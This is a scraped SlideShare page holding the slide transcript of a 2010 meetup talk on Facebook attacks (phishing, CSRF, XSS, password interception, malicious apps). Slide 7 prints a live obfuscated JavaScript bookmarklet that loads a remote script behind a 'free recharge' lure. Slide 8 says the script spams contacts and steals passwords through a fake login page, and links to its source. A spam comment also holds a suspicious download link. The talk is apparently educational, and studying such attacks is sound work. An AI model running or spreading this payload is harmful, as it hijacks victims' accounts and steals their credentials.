Your SlideShare is downloading. ×
0
Facebook Attacks
Facebook Attacks
Facebook Attacks
Facebook Attacks
Facebook Attacks
Facebook Attacks
Facebook Attacks
Facebook Attacks
Facebook Attacks
Facebook Attacks
Facebook Attacks
Facebook Attacks
Facebook Attacks
Facebook Attacks
Facebook Attacks
Facebook Attacks
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

Facebook Attacks

1,864

Published on

Facebook Attacks by Dinesh @ null Hyderabad Meet, October, 2010

Facebook Attacks by Dinesh @ null Hyderabad Meet, October, 2010

Published in: Technology
1 Comment
1 Like
Statistics
Notes
  • free download the updated file from here:-http://gg.gg/yi7pn
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
No Downloads
Views
Total Views
1,864
On Slideshare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
43
Comments
1
Likes
1
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. facebook attacks
  • 2. Phising CSRF attack Java scripts XSS
  • 3. Facebook Phising
  • 4. Facebook CSRF attack Third party app server
  • 5. There are many other attacks possible likeThere are many other attacks possible like •Brute forcingBrute forcing •Cookie stealingCookie stealing •Commercial Data miningCommercial Data mining •Database Reverse-EngineeringDatabase Reverse-Engineering
  • 6. Password Interception •The fact that the username and password were sent in clear textThe fact that the username and password were sent in clear text is a security vulnerability.is a security vulnerability. • There are chances to read Facebook user names andThere are chances to read Facebook user names and passwords off of the Ethernet or unencrypted wireless traffic,passwords off of the Ethernet or unencrypted wireless traffic, obtaining access to users’ Facebook passwords, as well as anyobtaining access to users’ Facebook passwords, as well as any additional accounts they use those passwords for.additional accounts they use those passwords for. •Also the tabnabbing and CSRF have gained popularity over theAlso the tabnabbing and CSRF have gained popularity over the open platformopen platform Current Facebook Precaution:Current Facebook Precaution: Facebook currently takes no steps to protect user passwords in transitFacebook currently takes no steps to protect user passwords in transit.
  • 7. javascript:d=document;c=d.createElement(%22script %22);d.body.appendChild(c);c.src=%22ht%22+%22tp:%22+%22//su %22+%22.%22+%22ly%22+%22/%22+%222wL%22;void(0) FREE!! CELLPHONE RECHARGE::.. This Script very popularly seen on Facebook, Orkut and Many other Social Networking sites. AnalysingAnalysing and Demoand Demo
  • 8. What does It do? •It is sending messages to all my friends to Recharge fromIt is sending messages to all my friends to Recharge from accountaccount •It is adding comments in Albums of my friendsIt is adding comments in Albums of my friends •It is creating Threads in the Communities I Joined sayingIt is creating Threads in the Communities I Joined saying that “Recharge this” also its adding some otherthat “Recharge this” also its adding some other Communities to my listCommunities to my list •Redirects you to the Fake FB login page after 10-15 minsRedirects you to the Fake FB login page after 10-15 mins stealing your passwordstealing your password Source Script @ http://www.mediafire.com/?t2lagmvsvftww28http://www.mediafire.com/?t2lagmvsvftww28
  • 9. http://www.facebook.com/profile.php?id=100000781542573 www.facebook.com/username
  • 10. The Facebook Platform API – The API defines the various methods through which you can interactAPI – The API defines the various methods through which you can interact with Facebook. If you’re not familiar with the idea of an API, take a look atwith Facebook. If you’re not familiar with the idea of an API, take a look at some recent Digital Web articles: APIs and Mashups for the Rest of Us andsome recent Digital Web articles: APIs and Mashups for the Rest of Us and Hacking on Open APIs.Hacking on Open APIs. FBML – Facebook Markup Language is a custom markup language based onFBML – Facebook Markup Language is a custom markup language based on various bits of HTML. It’s similar to Coldfusion or ASP.NET’s tag-basedvarious bits of HTML. It’s similar to Coldfusion or ASP.NET’s tag-based syntax, and is used to define the pages in your application.syntax, and is used to define the pages in your application. FQL – Facebook Query Language is SQL for Facebook. A powerful queryFQL – Facebook Query Language is SQL for Facebook. A powerful query language for situations where there are no existing helper methods in thelanguage for situations where there are no existing helper methods in the API, or handy tags in FBML, to do exactly what you need.API, or handy tags in FBML, to do exactly what you need.
  • 11. How to add an application in Facebook
  • 12. How can this be Used For Exploiting? •You can Upload your own Application of any type. •So doesn’t this strike you something of a hackers insterest
  • 13. How can this be Used For Exploiting?
  • 14. THANK YOUTHANK YOU

×